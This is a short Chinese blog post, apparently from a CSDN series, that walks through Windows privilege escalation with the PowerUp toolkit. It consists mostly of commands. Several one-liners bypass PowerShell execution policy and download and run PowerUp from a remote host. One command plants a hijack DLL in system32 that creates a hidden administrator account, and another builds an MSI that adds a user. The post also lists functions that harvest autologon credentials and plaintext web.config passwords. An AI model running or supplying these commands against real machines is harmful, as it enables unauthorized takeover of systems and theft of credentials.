WEB渗透Win提权篇-PowerUp

本文主要是介绍WEB渗透Win提权篇-PowerUp，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

 提权工具合集包（免费分享）： 夸克网盘分享

 往期文章

WEB渗透Win提权篇-提权工具合集-CSDN博客

WEB渗透Win提权篇-RDP&Firewall-CSDN博客

WEB渗透Win提权篇-MSSQL-CSDN博客

WEB渗透Win提权篇-MYSQL-udf-CSDN博客

WEB渗透Win提权篇-AccountSpoofing-CSDN博客

WEB渗透Win提权篇-弱权限提权-CSDN博客

WEB渗透Win提权篇-PowerUp-CSDN博客

检测有漏洞的服务

>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1');Invoke-AllChecks"

>icacls C:\Windows\system32\\wlbsctrl.dll 查看文件权限，F为完全控制，M修改

在AbuseFunction中会显示利用语句。

>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1'); Write-HijackDll -OutputFile 'C:\Windows\system32\\wlbsctrl.dll' -Command 'net user admin pass@Qwe1 /add&net localgroup administrators admin /add'"

重启电脑后会新增用户admin

查找可能劫持的进程

>Find-ProcessDLLHijack

查找环境变量中当前用户可修改的目录

>Find-PathDLLHijack

查找存在注册表中自动登录用户的平局

>Get-RegistryAutoLogon

查询trusted_service_path

>Get-ServiceUnquoted

查询当前用户可修改的注册表开机启动项

>Get-ModifiableRegistryAutoRun

查询当前用户可修改的计划任务项

>Get-ModifiableScheduledTaskFile

查询系统中所有web.config文件中的明文密码

>Get-WebConfig

AlwaysInstallElevated

>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1');Get-RegAlwaysInstallElevated"

>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powertools/PowerUp/PowerUp.ps1'); Write-UserAddMSI"

普通用户执行安装

这篇关于WEB渗透Win提权篇-PowerUp的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---